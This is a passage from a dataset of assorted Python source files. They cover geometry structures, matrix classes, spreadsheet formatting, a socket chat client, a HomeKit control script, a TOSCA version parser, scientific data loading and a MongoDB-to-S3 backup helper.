f.write(\"AVERAGE NUMBER OF GENERATIONS: \" + str(gen_avg) + '\\n')\r\n    f.write(\"AVERAGE EXECUTION TIME: \" + str(ext_avg) + \"s\\n\")\r\n    f.write(\"SUCCES RATE: \" + str(s_rate) + \"%\\n\")","sub_path":"NEdata/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"103110952","text":"from django.urls import path, include\nfrom . 
import views\n\n\napp_name = 'home'\n\nurlpatterns = [\n    path('', views.index, name='index'),\n    # path('', views.IndexListView.as_view(), name='index'),\n    path('details/', views.details, name='details'),\n    path('register.html', views.UserFormView.as_view(), name='register'),\n    path('login/', views.UserLoginView.as_view(), name='login'),\n    path('logout/', views.logout, name='logout'),\n]","sub_path":"home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"565952562","text":"\"\"\"\ndoubly connected edge list\n\nrepresentation for network algorithms\n\"\"\"\n\n\n# example of edges from de berg fig 2.6\n\nimport pysal as ps\n\nimport networkx as nx\n\n\nclass Vertex:\n    \"\"\" \"\"\"\n    def __init__(self, coordinates, incident_edge):\n        self.coordinates = coordinates\n        self.incident_edge = incident_edge\n\nclass Face:\n    \"\"\" \"\"\"\n    def __init__(self, outer_component=None, inner_component=None):\n\n        self.outer_component = outer_component\n        self.inner_component = inner_component\n\nclass Half_Edge:\n    \"\"\" \"\"\"\n    def __init__(self, origin, twin, incident_face, Next, Prev):\n        self.origin = origin\n        self.twin = twin\n        self.incident_face = incident_face\n        self.Next = Next\n        self.Prev = Prev\n\n\nclass DCEL:\n    \"\"\"Doubly connected edge list\"\"\"\n    def __init__(self, graph):\n\n        edges = {}\n        vertices = {}\n        faces = {}\n        half_edges = {}\n\n        cycles = nx.cycle_basis(graph)\n        fi = 0\n        for cycle in cycles:\n            n = len(cycle)\n            for i in range(n-1):\n                e = (cycle[i], cycle[i+1])\n                if e not in edges:\n                    edges[e] = fi\n                twin_a = e[0], e[1]\n                twin_b = e[1], e[0]\n                if twin_a not in half_edges:\n                    half_edges[twin_a] = fi\n                if twin_b not in half_edges:\n                    half_edges[twin_b] = None\n            e = cycle[n-1], cycle[0]\n            if e not in edges:\n                edges[e] = fi\n            faces[fi] = e\n\n\n            fi += 1\n\n        self.edges = edges\n        self.faces = faces\n        self.half_edges = half_edges\n\n\nif __name__ == '__main__':\n\n\n    p1 = [\n        [1,12],\n        [6,12],\n        [11,11],\n        [14,13],\n        [19,14],\n        [22,9],\n        [20,5],\n        [16,0],\n        [11,2],\n        [5,1],\n        [0,7],\n        [2,9],\n        [1,12]]\n\n    h1 = [\n        [3,7],\n        [5,5],\n        [8,5],\n        [5,8],\n        [3,7]\n    ]\n\n    h2 = [\n        [4,10],\n        [5,8],\n        [8,5],\n        [9,8],\n        [4,10]\n    ]\n\n    h3 = [\n        [12,6],\n        [15,4],\n        [18,5],\n        [19,7],\n        [17,9],\n        [14,9],\n        [12,6]\n    ]\n    # note that h1 union h2 forms a single hole in p1\n\n    faces = [p1, h1, h2, h3]\n    G = nx.Graph()\n\n    for face in faces:\n        n = len(face)\n        for i in range(n-1):\n            G.add_edge(tuple(face[i]), tuple(face[i+1]))\n\n\n    cycles = nx.cycle_basis(G)\n    # len of cycles is equal to the number of faces (not including the external face)\n\n    # find cycles that share a vertex\n    node2cycle = {}\n    multi_nodes = set()\n    for i,cycle in enumerate(cycles):\n        for node in cycle:\n            if node in node2cycle:\n                node2cycle[node].append(i)\n                multi_nodes.add(node)\n            else:\n                node2cycle[node] = [i]\n\n\n    # check if there are nodes belonging to multiple cycles\n    if multi_nodes:\n\n        # put nodes for each edge in lexicographic order\n        edges = [ sorted(edge) for edge in G.edges()]\n\n\n","sub_path":"pysal/network/dcel.py","file_name":"dcel.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"}
+{"seq_id":"225966633","text":"import numpy as np\n\n\nclass Matrix(np.ndarray):\n    def __new__(cls, ndarray=None):\n        if ndarray is None:\n            ndarray = np.eye(4)\n        obj = np.asanyarray(ndarray).view(cls)\n        return obj\n\n    def __repr__(self):\n        return 
f\"Matrix({repr(self.tolist())})\"\n\n def __eq__(self, other):\n return np.allclose(self, other)\n\n def __matmul__(self, other):\n if isinstance(other, Matrix):\n return super().__matmul__(other).view(other.__class__)\n else:\n return super().__matmul__(other.T).T.view(other.__class__)\n\n @property\n def inv(self):\n return np.linalg.inv(self)\n\n @staticmethod\n def from_string(string):\n ndarray = np.array(\n [\n [float(xx) for xx in x.split(\"|\")[1:-1]]\n for x in string.strip().splitlines()\n ]\n )\n return Matrix(ndarray)\n\n\nclass Translation(Matrix):\n def __new__(cls, x, y, z):\n obj = super().__new__(cls)\n obj[:3, 3] = [x, y, z]\n return obj\n\n\nclass Scaling(Matrix):\n def __new__(cls, x, y, z):\n obj = super().__new__(cls, np.diag([x, y, z, 1]))\n return obj\n\n\nclass Rotation(Matrix):\n def __new__(cls, x, y, z):\n matrix = np.eye(4)\n\n if x:\n matrix_x = np.eye(4)\n matrix_x[1:3, 1:3] = [[np.cos(x), -np.sin(x)], [np.sin(x), np.cos(x)]]\n matrix = matrix_x @ matrix\n\n if y:\n matrix_y = np.eye(4)\n matrix_y[::2, ::2] = [[np.cos(y), np.sin(y)], [-np.sin(y), np.cos(y)]]\n matrix = matrix_y @ matrix\n\n if z:\n matrix_z = np.eye(4)\n matrix_z[:2, :2] = [[np.cos(z), -np.sin(z)], [np.sin(z), np.cos(z)]]\n matrix = matrix_z @ matrix\n\n obj = super().__new__(cls, matrix)\n return obj\n\n\nclass Shearing(Matrix):\n def __new__(cls, xy, xz, yx, yz, zx, zy):\n matrix = np.eye(4)\n matrix[:3, :3] = [[1, xy, xz], [yx, 1, yz], [zx, zy, 1]]\n obj = super().__new__(cls, matrix)\n return obj\n","sub_path":"src/matrix/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"177610563","text":"# add_job\n## solve model_start_time, model_end_time, model_restart variables.\n### handle nones\n## copy namelist from setup object to job\n## apply solved times/restart to job's namelists\n### namelist.hrldas: start, khour, kday, RESTART\n### hydro.namelist: HYDRO_RST\n## if restart: check that the restart is available\n## diff the setup namelists with the new one to ensure only certain fields are changed.\n\n\nimport datetime\nimport os\nimport re\nfrom wrfhydropy import *\n\nhome = os.path.expanduser(\"~/\")\nmodel_path = home + '/WRF_Hydro/'\nthe_model = WrfHydroModel(\n os.path.expanduser(model_path + '/wrf_hydro_nwm_public/trunk/NDHMS'),\n 'NWM'\n)\n\ndomain_path = '/Users/james/Downloads/croton_NY_domain/domain/croton_NY/'\nthe_domain = WrfHydroDomain(\n domain_top_dir=domain_path,\n model_version='v1.2.1',\n domain_config='NWM'\n)\n\nthe_setup = WrfHydroSetup(\n the_model,\n the_domain\n)\n\nsolve_model_start_end_times = job_tools.solve_model_start_end_times\n\n# #################################\n\n# All are 1 day and 2 hours.\ndef assert_start_end_soln(s,e):\n assert s == datetime.datetime(2011, 8, 26, 0, 0)\n assert e == datetime.datetime(2011, 9, 2, 0, 0)\n\n\ns, e = solve_model_start_end_times(None, None, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00'\nmodel_end_time = '2011-09-02 00'\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00:00'\nmodel_end_time = '2011-09-02 00'\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00:00'\nmodel_end_time = datetime.timedelta(days=7)\ns, e = solve_model_start_end_times(model_start_time, model_end_time, 
the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00:00'\nmodel_end_time = {'hours': 24*7}\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n\nmodel_start_time = '2011-08-26 00:00'\nmodel_end_time = {'days': 6, 'hours': 24}\ns, e = solve_model_start_end_times(model_start_time, model_end_time, the_setup)\nassert_start_end_soln(s, e)\n","sub_path":"wrfhydro/one_off_scripts/example_job_model_dates.py","file_name":"example_job_model_dates.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"45894558","text":"import xlwt\n\nwb=xlwt.Workbook()\nsht=wb.add_sheet('Sheet1',cell_overwrite_ok=True)\n\nborders=xlwt.Borders()\nborders.top=1\nborders.left=1\nborders.right=1\nborders.bottom=1\n\nalignment=xlwt.Alignment()\nalignment.horz=0x02\nalignment.vert=0x01\n\ntile_font=xlwt.Font()\ntile_font.bold=True\ntile_font.height=350\ntile_font.colour_index=10\n\nltile_font=xlwt.Font()\nltile_font.bold=True\n\ntile_font1=xlwt.Font()\ntile_font1.bold=True\ntile_font1.height=350\ntile_font1.colour_index=49\n\ntile_font2=xlwt.Font()\ntile_font2.bold=True\ntile_font2.height=350\ntile_font2.colour_index=17\n\n\ncell_style=xlwt.XFStyle()\ncell_style.alignment=alignment\ncell_style.borders=borders\n\nlittle_style=xlwt.XFStyle()\nlittle_style.alignment=alignment\nlittle_style.borders=borders\nlittle_style.font=ltile_font\n\nbig_title=xlwt.XFStyle()\nbig_title.font=tile_font\nbig_title.alignment=alignment\nbig_title.borders=borders\n\nsec_title=xlwt.XFStyle()\nsec_title.font=tile_font1\nsec_title.alignment=alignment\nsec_title.borders=borders\n\ntrd_title=xlwt.XFStyle()\ntrd_title.font=tile_font2\ntrd_title.alignment=alignment\ntrd_title.borders=borders\n\n\nsht.write_merge(0,0,0,3,\"标兵榜\",big_title)\nsht.write(1,0,\"支行\",little_style)\nsht.write(1,1,\"完成率\",little_style)\nsht.write(1,2,\"支行\",little_style)\nsht.write(1,3,\"完成率\",little_style)\n\nsht.write_merge(4,4,0,3,\"前有标兵后有追兵榜\",sec_title)\nsht.write(5,0,\"支行\",little_style)\nsht.write(5,1,\"完成率\",little_style)\nsht.write(5,2,\"支行\",little_style)\nsht.write(5,3,\"完成率\",little_style)\n\nsht.write_merge(9,9,0,3,\"追兵榜\",trd_title)\nsht.write(10,0,\"支行\",little_style)\nsht.write(10,1,\"完成率\",little_style)\nsht.write(10,2,\"支行\",little_style)\nsht.write(10,3,\"完成率\",little_style)\nrow_list=[['先行区', 0.12452830188679245], ['历城', 0.07045454545454545], ['济阳', 0.060909090909090906], ['平阴', 0.03495145631067961], ['开发区', 0.034375], ['商河', 0.03428571428571429], ['章丘', 0.01869918699186992], ['营业部', 0.01818181818181818], ['和平', 0.01598173515981735], ['银河', 0.014634146341463415], ['槐荫', 0.013488372093023256], ['天桥', 0.009583333333333333], ['长清', 0.009285714285714286], ['泺源', 0.008556149732620321], ['市中', 0.0084], ['历下', 0.004285714285714286]]\n\nfor i,city in enumerate(row_list):\n\tif i<4:\n\t\tif i<2:\n\t\t\tj=0\n\t\telse:\n\t\t\tj=2\n\t\tsht.write((2+i%2),j,city[0],cell_style)\n\t\tsht.write((2+i%2),j+1,city[1],cell_style)\n\t\tcontinue\n\tif i<10:\n\t\tif i<7:\n\t\t\tm=2\n\t\t\tj=0\n\t\telse:\n\t\t\tm=-1\n\t\t\tj=2\n\t\tsht.write((i+m),j,city[0],cell_style)\n\t\tsht.write((i+m),j+1,city[1],cell_style)\n\t\tcontinue\n\tif i<16:\n\t\tif 
i<13:\n\t\t\tj=0\n\t\t\tm=1\n\t\telse:\n\t\t\tm=-2\n\t\t\tj=2\n\t\tsht.write((i+m),j,city[0],cell_style)\n\t\tsht.write((i+m),j+1,city[1],cell_style)\n\t\tcontinue\n\n\n\nwb.save('a.xls')\n\n\n","sub_path":"python/xlwt_xls.py","file_name":"xlwt_xls.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"481922962","text":"def manhattan(point1, point2):\n return sum(abs(coord1 - coord2) for coord1, coord2 in zip(point1, point2))\n\n\ndef solve(filename):\n points = []\n with open(filename) as fp:\n for line in fp.readlines():\n pos, r = line.split(' ')\n r_num = int(r.lstrip('r='))\n pos_nums = pos.lstrip('pos=<').rstrip('>,').split(',')\n point = list(map(int, pos_nums))\n point.append(r_num)\n points.append(point)\n\n max_range = max(points, key=lambda x: x[3])\n \n in_range = 0\n for point in points:\n in_range += 1 if manhattan(point[:3], max_range[:3]) <= max_range[3] else 0\n \n return in_range\n\nassert solve('easy_input') == 7\nprint(solve('input'))\n","sub_path":"python/d23p1/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"5837674","text":"# 客户端\n\n# 收发 同时进行 把这个客户端做成一个类\n\n\nimport socket\nimport threading\n\n\nclass Client():\n def __init__(self):\n # 1. 创建套接字\n self.sk = socket.socket()\n # 2. 去链接服务器\n self.sk.connect((\"192.168.40.153\",666))\n t1 = threading.Thread(target=self.recv) # 开启子线程执行发送消息\n t1.start()\n self.send()\n # 发送消息\n def send(self):\n while True:\n str1 = input(\"请输入:\")\n self.sk.send(str1.encode(\"utf8\"))\n print(\"发过去了\")\n\n # 接收消息\n def recv(self):\n while True:\n source = self.sk.recv(1024).decode(\"utf8\")\n print(source)\n print(\"接收消息了\")\n\n\nif __name__ == '__main__':\n Client()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"woniu_workspace/python/day09/聊天室3——1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"597103991","text":"#print one message if the try block raises a NameError and another for other errors\n\ntry:\n a = 123\n if a==123:\n print(b)\n raise NameError(\"Name error\")\n if a >0:\n raise ValueError(\"Value error\")\nexcept NameError as ne:\n print(ne)\nexcept ValueError as ve:\n pritn(ve)\n","sub_path":"(III).py","file_name":"(III).py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"592266870","text":"from math import atan2, pi\n\nclass Solution:\n def visiblePoints(self, points: List[List[int]], angle: int, location: List[int]) -> int:\n if len(points) == 1:\n return 1\n \n lx, ly = location\n angles = []\n me = 0\n \n for px, py in points:\n if px == lx and py == ly:\n me += 1\n else:\n angles.append(atan2(py - ly, px - lx))\n\n angles.sort()\n angles.extend([x + (2.0 * pi) for x in angles])\n \n l, r = 0, 0\n res = 0\n angle = (2 * pi * angle) / 360.0\n while l < len(angles) and r < len(angles):\n while r < len(angles) and angles[r] - angles[l] <= angle:\n res = max(res, r - l + 1)\n r += 1\n l += 1\n \n return res + 
me","sub_path":"python/1610_Maximum_Number_of_Visible_Points.py","file_name":"1610_Maximum_Number_of_Visible_Points.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"113431685","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n------------------------ Libraries & Global variables -------------------------\n\"\"\"\nimport os\nimport scipy.io as sio\nimport numpy as np\nimport pandas as pd\nfrom global_path import DATA_DIR, STIMULI\n\n\"\"\"\n-------------------------------- Read file data -------------------------------\n\"\"\"\ndef read_mat_file(stimulus, patient_id, data_dir = DATA_DIR):\n save_file = 'Stimuli'+str(stimulus)+'__'+patient_id+'.mat'\n file_path = os.path.join(data_dir, save_file)\n vid_data = sio.loadmat(file_path)['vid_data']\n values = vid_data.item()\n field = vid_data.dtype.names\n dict_list = [(field[i], values[i]) for i in range(len(field))]\n dict_list.append(('id', patient_id))\n return dict(dict_list)\n\ndef read_MCHAT(data_dir = DATA_DIR):\n file_path = os.path.join(data_dir, 'questions.xlsx')\n df = pd.read_excel(file_path, index_col=None)\n ids = df['Individual'].values\n X = (df.values[:,2:22] == 'fail') + 0\n y = df['Asd'].values\n neg, pos, mid, unk = y=='no', y=='yes', y=='suspected', y=='unknown'\n y[pos], y[neg], y[mid], y[unk] = 1, -1, 0, np.nan\n mchat_scoring = df.values[:,22:]\n return ids, X, y, mchat_scoring\n\n\"\"\"\n------------------------- Split training and testing --------------------------\n\"\"\"\ndef split(data_dir = DATA_DIR, percentage = .3):\n # Read files\n ids, X, y, mchat_scoring = read_MCHAT(data_dir)\n pos, neg = ids[y==1], ids[y==-1]\n # Number to remove\n remove_pos = int(percentage * pos.shape[0])\n remove_neg = int(percentage * neg.shape[0])\n # Split ids\n test_pos = np.random.permutation(pos)[:remove_pos]\n test_neg = np.random.permutation(neg)[:remove_neg]\n # Write it in a file, this is not really the best way to do it\n test, test_y = list(), list()\n train, train_y = list(), list()\n for i in range(len(ids)):\n patient_id = ids[i]\n if patient_id in test_pos or patient_id in test_neg:\n test.append(patient_id)\n test_y.append(y[i])\n else: \n train.append(patient_id)\n train_y.append(y[i])\n test_tmp = np.transpose(np.vstack((test, test_y)))\n testFrame = pd.DataFrame(test_tmp, columns=['Id','Output'])\n train_tmp = np.transpose(np.vstack((train, train_y)))\n trainFrame = pd.DataFrame(train_tmp, columns=['Id','Output'])\n testFrame.to_csv(os.path.join(data_dir, 'test_ids.csv'), index=None)\n trainFrame.to_csv(os.path.join(data_dir, 'train_ids.csv'), index=None)\n\n\"\"\"\n--------------------------------- Access data ---------------------------------\n\"\"\"\ndef get_ids(data_dir = DATA_DIR):\n ids, _, labels, _ = read_MCHAT(data_dir=data_dir)\n return ids, labels\n\ndef keep_label(ids, labels, keep=\"good\", verbose = False):\n if keep == \"pos\":\n ind = labels==1\n elif keep == \"neg\":\n ind = labels==-1\n elif keep == \"good\":\n ind = np.logical_or(labels==-1, labels==1)\n if verbose:\n return ids[ind], labels[ind].astype(np.int), ind\n else:\n return ids[ind], labels[ind].astype(np.int)\n \ndef get_data(stimulus, patient_id, data_dir = DATA_DIR):\n dictionary = read_mat_file(stimulus, patient_id, data_dir = data_dir)\n detected = dictionary.get('face_detection').flatten() == 1\n timestamps = dictionary.get('timestamps').flatten()\n timestamps = timestamps[detected]\n landmarks = 
dictionary.get('original_landmarks')\n landmarks = landmarks[:, detected]\n # Correct potential overflow\n timestamps = timestamps.astype(np.float32)\n landmarks = landmarks.astype(np.float32)\n return landmarks, timestamps\n\n\"\"\"\n------------------------------- Access all data -------------------------------\n\"\"\" \ndef compute_all(features_extractor, ids):\n nb_ids, nb_stimulis = len(ids), len(STIMULI)\n values = np.zeros((nb_ids, nb_stimulis)).astype(np.dtype(object))\n ind = np.zeros(nb_ids)==0\n for i in range(nb_ids):\n patient_id = ids[i]\n for j in range(nb_stimulis):\n stimulus = STIMULI[j]\n try:\n landmarks, timestamps = get_data(stimulus, patient_id)\n features = features_extractor(landmarks, timestamps, stimulus)\n values[i,j] = features\n except FileNotFoundError:\n ind[i] = False\n print(\"Patient %s stimuli %d not found\" %(patient_id,stimulus))\n continue \n return values[ind,:], ind\n \ndef concatenate_all(values): \n all_val = np.hstack(values[:,0])\n for i in range(1,4):\n tmp = np.hstack(values[:,i])\n all_val = np.hstack((all_val, tmp))\n all_val[np.isnan(all_val)] = 0\n all_val[all_val==np.inf] = 0\n all_val[all_val==-np.inf] = 0\n return all_val\n\ndef homogenized_description(extractor, keep='good',\n homogenize=False, keep_norm='neg'):\n all_ids, all_labels = get_ids()\n ids, labels = keep_label(all_ids, all_labels, keep=keep)\n values, ind = compute_all(extractor, ids)\n ids, labels = ids[ind], labels[ind]\n \n if homogenize:\n _, _, ind = keep_label(ids, labels, keep=keep_norm, verbose=True)\n val = values[ind, :]\n all_values = concatenate_all(val)\n mean = np.expand_dims(np.mean(all_values, axis=1), axis=1)\n std = np.expand_dims(np.sqrt(np.var(all_values, axis=1)), axis=1)\n for i in range(values.shape[0]):\n for j in range(values.shape[1]):\n tmp = values[i,j] \n tmp -= mean\n tmp /= std\n tmp[np.isnan(tmp)] = 0\n values[i,j] = tmp\n return values, labels, ids","sub_path":"data_handling.py","file_name":"data_handling.py","file_ext":"py","file_size_in_byte":5617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"427849803","text":"#!/usr/bin/env python3\n\nimport json\nimport argparse\nimport http.client\nimport sys\n\nfrom homekit import find_device_ip_and_port, SecureHttp, load_pairing, get_session_keys, HapStatusCodes\n\n\ndef setup_args_parser():\n parser = argparse.ArgumentParser(description='HomeKit perform app - performs operations on paired devices')\n parser.add_argument('-f', action='store', required=True, dest='file', help='File with the pairing data')\n parser.add_argument('-c', action='store', required=False, dest='characteristics')\n parser.add_argument('-v', action='store', required=False, dest='value')\n\n return parser\n\n\nif __name__ == '__main__':\n parser = setup_args_parser()\n args = parser.parse_args()\n\n pairing_data = load_pairing(args.file)\n if pairing_data is None:\n print('File {file} not found!'.format(file=args.file))\n sys.exit(-1)\n\n deviceId = pairing_data['AccessoryPairingID']\n\n connection_data = find_device_ip_and_port(deviceId)\n if connection_data is None:\n print('Device {id} not found'.format(id=deviceId))\n sys.exit(-1)\n\n conn = http.client.HTTPConnection(connection_data['ip'], port=connection_data['port'])\n pairing_data = load_pairing(args.file)\n\n controllerToAccessoryKey, accessoryToControllerKey = get_session_keys(conn, pairing_data)\n\n if not args.characteristics:\n parser.print_help()\n sys.exit(-1)\n if not args.value:\n parser.print_help()\n 
sys.exit(-1)\n\n tmp = args.characteristics.split('.')\n aid = int(tmp[0])\n iid = int(tmp[1])\n value = args.value\n\n sec_http = SecureHttp(conn.sock, accessoryToControllerKey, controllerToAccessoryKey)\n\n body = json.dumps({'characteristics': [{'aid': aid, 'iid': iid, 'value': value}]})\n print(body)\n response = sec_http.put('/characteristics', body)\n data = response.read().decode()\n if response.code != 204:\n data = json.loads(data)\n code = data['status']\n print('put_characteristics failed because: {reason} ({code})'.format(reason=HapStatusCodes[code], code=code))\n else:\n print('put_characteristics succeeded')\n\n conn.close()\n","sub_path":"homekit/put_characteristic.py","file_name":"put_characteristic.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"607608331","text":"# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom itertools import imap\nfrom collections import namedtuple\n\nfrom ..exceptions import DSLParsingLogicException\n\nVERSION = 'tosca_definitions_version'\nBASE_VERSION_PROFILE = 'tosca_aria_yaml'\n\n\nclass VersionNumber(namedtuple('VersionNumber', 'major, minor, micro')):\n def __new__(cls, major, minor, micro=0):\n return super(VersionNumber, cls).__new__(cls, major, minor, micro)\n\n def __repr__(self):\n return (\n '{cls.__name__}'\n '(major={self.major}, minor={self.minor}, micro={self.micro})'\n .format(cls=self.__class__, self=self))\n\n\nclass VersionStructure(namedtuple('VersionStructure', 'profile, number')):\n def __repr__(self):\n return (\n '{cls.__name__}(profile={self.profile}, number={self.number!r})'\n .format(cls=self.__class__, self=self))\n\n @property\n def name(self):\n return (\n '{self.profile}_{self.number.major}_'\n '{self.number.minor}_{self.number.micro}'.format(self=self))\n\n\nclass SupportedVersions(object):\n def __init__(self, database):\n self.database = database\n\n def __contains__(self, version):\n return any(imap(\n lambda supported_version: supported_version == version,\n self.versions()))\n\n @property\n def base_version(self):\n return next(iter(self.database[BASE_VERSION_PROFILE]))\n\n def versions(self):\n for version_structures in self.database.itervalues():\n for version_structure in version_structures:\n yield version_structure\n\n def create_version_structure(self, version_name):\n if not version_name:\n raise DSLParsingLogicException(\n 71, '{0} is missing or empty'.format(VERSION))\n\n if not isinstance(version_name, basestring):\n raise DSLParsingLogicException(\n 72, 'Invalid {0}: {1} is not a string'.format(\n VERSION, version_name))\n\n for prefix in self.database.iterkeys():\n if version_name.startswith(prefix):\n short_dsl_version = version_name[len(prefix) + 1:]\n break\n 
else:\n raise DSLParsingLogicException(\n 73, \"Invalid {0}: '{1}', expected a value following \"\n \"this format: '{2}'\".format(\n VERSION, version_name, self.base_version.name))\n\n if '_' not in short_dsl_version:\n raise DSLParsingLogicException(\n 73, \"Invalid {0}: '{1}', \"\n \"expected a value following this format: '{2}'\".format(\n VERSION, version_name, self.base_version.name))\n\n version_parts = short_dsl_version.split('_')\n if len(version_parts) == 2:\n major, minor = version_parts\n micro = '0'\n else:\n major, minor, micro = version_parts\n\n if not major.isdigit():\n raise DSLParsingLogicException(\n 74, \"Invalid {0}: '{1}', major version is '{2}' \"\n \"while expected to be a number\".format(\n VERSION, version_name, major))\n\n if not minor.isdigit():\n raise DSLParsingLogicException(\n 75, \"Invalid {0}: '{1}', minor version is '{2}' \"\n \"while expected to be a number\".format(\n VERSION, version_name, minor))\n\n if not micro.isdigit():\n raise DSLParsingLogicException(\n 76, \"Invalid {0}: '{1}', micro version is '{2}' \"\n \"while expected to be a number\".format(\n VERSION, version_name, micro))\n\n return VersionStructure(\n profile=prefix, # pylint: disable=undefined-loop-variable\n number=VersionNumber(int(major), int(minor), int(micro)))\n\n def validate_dsl_version(self, version_structure):\n if version_structure not in self:\n raise DSLParsingLogicException(\n 29,\n 'Unexpected tosca_definitions_version {0!r}; Currently '\n 'supported versions are: {1}'\n .format(version_structure, list(self.versions())))\n","sub_path":"aria/parser/dsl_supported_versions/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":4965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"134765852","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 29 09:50 2017\n\n@author: andrewalferman\n\"\"\"\n\nimport os as os\nimport numpy as np\nimport pyjacob as pyjacob\nimport matplotlib.pyplot as plt\n# import scipy as sci\n\n\ndef loadpasrdata(num):\n \"\"\"Load the initial conditions from the PaSR files.\"\"\"\n pasrarrays = []\n print('Loading data...')\n for i in range(num):\n filepath = os.path.join(os.getcwd(),\n 'pasr_out_h2-co_' +\n str(i) +\n '.npy')\n filearray = np.load(filepath)\n pasrarrays.append(filearray)\n return np.concatenate(pasrarrays, 1)\n\n\ndef rearrangepasr(Y, useN2):\n \"\"\"Rearrange the PaSR data so it works with pyJac.\"\"\"\n press_pos = 2\n temp_pos = 1\n arraylen = len(Y)\n\n Y_press = Y[press_pos]\n Y_temp = Y[temp_pos]\n Y_species = Y[3:arraylen]\n Ys = np.hstack((Y_temp, Y_species))\n\n # Put N2 to the last value of the mass species\n N2_pos = 9\n newarlen = len(Ys)\n Y_N2 = Ys[N2_pos]\n # Y_x = Ys[newarlen - 1]\n for i in range(N2_pos, newarlen - 1):\n Ys[i] = Ys[i + 1]\n Ys[newarlen - 1] = Y_N2\n if useN2:\n initcond = Ys\n else:\n initcond = Ys[:-1]\n return initcond, Y_press\n\n\n# Load the initial conditions from the PaSR files\npasr = loadpasrdata(1)\nnumparticles = len(pasr[0, :, 0])\nnumtsteps = len(pasr[:, 0, 0])\n\nfor i in pasr[469, 91, :]:\n print(i)\n\n\n\n# # All of the species names, after the data has been rearranged\n# speciesnames = ['H', 'H$_2$', 'O', 'OH', 'H$_2$O', 'O$_2$', 'HO$_2$',\n# 'H$_2$O$_2$', 'Ar', 'He', 'CO', 'CO$_2$', 'N$_2$']\n# # Keep in mind that the states also have temperature data\n#\n# states = np.empty((14, numtsteps*numparticles))\n#\n# # Rearrange all of the particles so that histograms can be made\n# count = 
0\n# for i in range(numparticles):\n# for j in range(numtsteps):\n# particle, press = rearrangepasr(pasr[j, i, :], True)\n# for k in range(len(particle)):\n# states[k, count] = particle[k]\n# count += 1\n#\n# # Clear all previous figures and close them all\n# for i in range(15):\n# plt.figure(i)\n# plt.clf()\n# plt.close('all')\n#\n# # Make the histograms and plots\n# print('Plotting...')\n# for i in range(7):\n# plt.figure(i)\n# if i == 0:\n# title = 'Temperature'\n# else:\n# title = speciesnames[i-1]\n# print(title)\n# plt.hist(states[i, :100100], bins='auto')\n# plt.title(title)\n#\n# plt.show()\n","sub_path":"H2_CO/PaSR_Histogram.py","file_name":"PaSR_Histogram.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"528958179","text":"import os\nfrom datetime import datetime\n\n# 3rd Party Imports\nimport boto\nfrom boto.s3.key import Key\nfrom click import echo\n\nfrom .utils import temp_directory, zipdir\nfrom .local import local_restore\nfrom .mongo import dump_db\n\n\ndef get_s3_bucket(s3_settings):\n conn = boto.connect_s3(s3_settings['aws_access_key_id'], s3_settings['aws_secret_access_key'])\n bucket = conn.get_bucket(s3_settings['bucket_name'])\n return bucket\n\n\ndef generate_uniqueish_key(s3_settings, environment, name_prefix):\n bucket = get_s3_bucket(s3_settings)\n\n if name_prefix and name_prefix != '':\n name_base = name_prefix\n else:\n name_base = environment['db_name']\n\n name_attempt = \"{}__{}.dmp.zip\".format(name_base, 